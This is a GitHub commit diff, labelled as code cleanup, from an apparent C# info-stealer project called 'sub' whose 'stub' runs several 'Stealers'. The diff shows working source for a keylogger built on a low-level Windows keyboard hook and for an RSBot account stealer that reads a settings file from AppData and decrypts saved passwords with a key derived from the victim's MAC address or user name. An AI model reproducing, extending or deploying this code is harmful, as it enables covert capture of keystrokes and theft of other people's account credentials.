Permalink
Browse files

more minor changes and code cleaning

  • Loading branch information...
1 parent bb6f5c3 commit 199fb5d81c3fe87a7d03768628e8be6bc8b5a688 @contra committed Apr 4, 2011
Showing with 123 additions and 103 deletions.
  1. +1 −1 sub/Program.cs
  2. +22 −13 sub/Stealers/Keylogger.cs
  3. +3 −89 sub/Stealers/RSBotStealer.cs
  4. +96 −0 sub/Util/Misc/HardwareInfo.cs
  5. +1 −0 sub/sub.csproj
View
@@ -48,7 +48,7 @@ private static void Main()
st.Start();
}
}
- Thread.Sleep(1000); //Sleep the main thread so the stub doesn't close
+ Thread.Sleep(5000); //Sleep the main thread so the stub doesn't close
}
}
}
@@ -1,9 +1,13 @@
-using System;
+#region Imports
+
+using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
using sub.Util.Misc;
+#endregion
+
namespace sub.Stealers
{
internal class Keylogger : IStealer
@@ -13,8 +17,8 @@ internal class Keylogger : IStealer
private const int WH_KEYBOARD_LL = 13;
private const int WM_KEYDOWN = 0x0100;
private const int WM_KEYUP = 0x0101;
- private LowLevelKeyboardProc _proc;
private IntPtr _hookID = IntPtr.Zero;
+ private LowLevelKeyboardProc _proc;
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr SetWindowsHookEx(int idHook,
@@ -41,9 +45,6 @@ private IntPtr SetHook(LowLevelKeyboardProc proc)
}
}
- private delegate IntPtr LowLevelKeyboardProc(
- int nCode, IntPtr wParam, IntPtr lParam);
-
private IntPtr HookCallback(
int nCode, IntPtr wParam, IntPtr lParam)
{
@@ -61,19 +62,15 @@ private IntPtr SetHook(LowLevelKeyboardProc proc)
return CallNextHookEx(_hookID, nCode, wParam, lParam);
}
+ private delegate IntPtr LowLevelKeyboardProc(
+ int nCode, IntPtr wParam, IntPtr lParam);
+
#endregion
+ private bool _capslock;
private string _name = "Keylogger";
- public string Name
- {
- get { return _name; }
- set { _name = value; }
- }
- public string Data { get; set; }
-
private bool _shift;
- private bool _capslock;
public Keylogger()
{
@@ -82,13 +79,25 @@ public Keylogger()
_capslock = false;
}
+ #region IStealer Members
+
+ public string Name
+ {
+ get { return _name; }
+ set { _name = value; }
+ }
+
+ public string Data { get; set; }
+
public void Collect()
{
_hookID = SetHook(_proc);
Application.Run();
UnhookWindowsHookEx(_hookID);
}
+ #endregion
+
private void ProcessKeyDown(int code)
{
if (code >= 65 && code <= 90)
@@ -19,13 +19,12 @@ namespace sub.Stealers
internal class RSBotStealer : IStealer
{
private const string SettingsFileName = "RSBot_Accounts.ini";
- private string _name = "RSBotStealer";
private string _settingsFile = Path.Combine(
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), SettingsFileName);
#region IStealer Members
-
+ private string _name = "RSBotStealer";
public string Name
{
get { return _name; }
@@ -36,7 +35,7 @@ public string Name
public void Collect()
{
- IEnumerable<RSBotAccount> accounts = GetLocalAccounts(GetLocalKey());
+ IEnumerable<RSBotAccount> accounts = GetLocalAccounts(HardwareInfo.GetLocalKey());
Data += "RSBot Account Stealer\r\n\r\n";
foreach (RSBotAccount acc in accounts)
{
@@ -91,99 +90,14 @@ private IEnumerable<RSBotAccount> GetLocalAccounts(string accountFileData, byte[
return ret.ToArray();
}
- private byte[] GetLocalKey()
- {
- NetworkInterface[] allNetworkInterfaces = NetworkInterface.GetAllNetworkInterfaces();
- int num = -1;
- int index = -1;
- int num4 = allNetworkInterfaces.Length - 1;
- for (int i = 0; i <= num4; i++)
- {
- if (allNetworkInterfaces[i].OperationalStatus == OperationalStatus.Up)
- {
- IPInterfaceProperties iPProperties = allNetworkInterfaces[i].GetIPProperties();
- if (iPProperties != null)
- {
- IPv4InterfaceProperties properties2 = iPProperties.GetIPv4Properties();
- if ((properties2 != null) && ((index < 0) || (properties2.Index < index)))
- {
- num = i;
- index = properties2.Index;
- }
- }
- }
- }
- byte[] buffer2 = ConvertByteEncoding((byte[]) Mac(GetMACAddress()));
- if (num >= 0)
- {
- return buffer2;
- }
- return Encoding.Default.GetBytes(Environment.UserName + CultureInfo.CurrentCulture.TwoLetterISOLanguageName);
- }
-
-
- private byte[] ConvertByteEncoding(byte[] key)
- {
- byte[] destinationArray = new byte[(key.Length - 1) + 1];
- Array.Copy(key, destinationArray, key.Length);
- int num2 = destinationArray.Length - 1;
- for (int i = 0; i <= num2; i++)
- {
- if (!IsValidIso88591(destinationArray[i]))
- {
- destinationArray[i] = 0x3f;
- }
- }
- return destinationArray;
- }
-
- internal string GetMACAddress()
- {
- ManagementObjectCollection instances =
- new ManagementClass("Win32_NetworkAdapterConfiguration").GetInstances();
- string str2 = string.Empty;
- foreach (ManagementObject obj2 in instances)
- {
- if (!str2.Equals(string.Empty)) continue;
- if (Convert.ToBoolean(obj2["IPEnabled"]))
- {
- str2 = obj2["MacAddress"].ToString().Replace(":", "");
- }
- obj2.Dispose();
- }
- return str2;
- }
-
-
- private bool IsValidIso88591(byte value)
- {
- return (value <= 0x7f) || (value >= 160);
- }
-
-
- public static object Mac(string ino)
- {
- byte[] bytes =
- BitConverter.GetBytes(long.Parse(ino, NumberStyles.HexNumber, CultureInfo.CurrentCulture.NumberFormat));
- Array.Reverse(bytes);
- byte[] buffer = new byte[6];
- int index = 0;
- do
- {
- buffer[index] = bytes[index + 2];
- index++;
- } while (index <= 5);
- return buffer;
- }
-
private static sbyte ToSByte(byte b)
{
return (sbyte) b;
}
- public static string DecryptPassword(string passwordHash, byte[] key)
+ private string DecryptPassword(string passwordHash, byte[] key)
{
byte[] array;
using (SHA1 sha = SHA1.Create())
@@ -0,0 +1,96 @@
+#region Imports
+
+using System;
+using System.Globalization;
+using System.Management;
+using System.Net.NetworkInformation;
+using System.Text;
+
+#endregion
+
+namespace sub.Util.Misc
+{
+ public static class HardwareInfo
+ {
+ public static byte[] GetLocalKey()
+ {
+ NetworkInterface[] allNetworkInterfaces = NetworkInterface.GetAllNetworkInterfaces();
+ int num = -1;
+ int index = -1;
+ int num4 = allNetworkInterfaces.Length - 1;
+ for (int i = 0; i <= num4; i++)
+ {
+ switch (allNetworkInterfaces[i].OperationalStatus)
+ {
+ case OperationalStatus.Up:
+ {
+ IPInterfaceProperties iPProperties = allNetworkInterfaces[i].GetIPProperties();
+ if (iPProperties == null) continue;
+ IPv4InterfaceProperties properties2 = iPProperties.GetIPv4Properties();
+ if ((properties2 == null) || ((index >= 0) && (properties2.Index >= index))) continue;
+ num = i;
+ index = properties2.Index;
+ }
+ break;
+ }
+ }
+ byte[] buffer2 = ConvertByteEncoding((byte[]) Mac(GetMACAddress()));
+ return num >= 0
+ ? buffer2
+ : Encoding.Default.GetBytes(Environment.UserName +
+ CultureInfo.CurrentCulture.TwoLetterISOLanguageName);
+ }
+
+ public static object Mac(string ino)
+ {
+ byte[] bytes =
+ BitConverter.GetBytes(long.Parse(ino, NumberStyles.HexNumber, CultureInfo.CurrentCulture.NumberFormat));
+ Array.Reverse(bytes);
+ byte[] buffer = new byte[6];
+ int index = 0;
+ do
+ {
+ buffer[index] = bytes[index + 2];
+ index++;
+ } while (index <= 5);
+ return buffer;
+ }
+
+ public static byte[] ConvertByteEncoding(byte[] key)
+ {
+ byte[] destinationArray = new byte[(key.Length - 1) + 1];
+ Array.Copy(key, destinationArray, key.Length);
+ int num2 = destinationArray.Length - 1;
+ for (int i = 0; i <= num2; i++)
+ {
+ if (!IsValidIso88591(destinationArray[i]))
+ {
+ destinationArray[i] = 0x3f;
+ }
+ }
+ return destinationArray;
+ }
+
+ public static string GetMACAddress()
+ {
+ ManagementObjectCollection instances =
+ new ManagementClass("Win32_NetworkAdapterConfiguration").GetInstances();
+ string str2 = string.Empty;
+ foreach (ManagementObject obj2 in instances)
+ {
+ if (!str2.Equals(string.Empty)) continue;
+ if (Convert.ToBoolean(obj2["IPEnabled"]))
+ {
+ str2 = obj2["MacAddress"].ToString().Replace(":", "");
+ }
+ obj2.Dispose();
+ }
+ return str2;
+ }
+
+ public static bool IsValidIso88591(byte value)
+ {
+ return (value <= 0x7f) || (value >= 160);
+ }
+ }
+}
View
@@ -43,6 +43,7 @@
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
+ <Compile Include="Util\Misc\HardwareInfo.cs" />
<Compile Include="Util\Misc\IStealer.cs" />
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />

0 comments on commit 199fb5d

Please sign in to comment.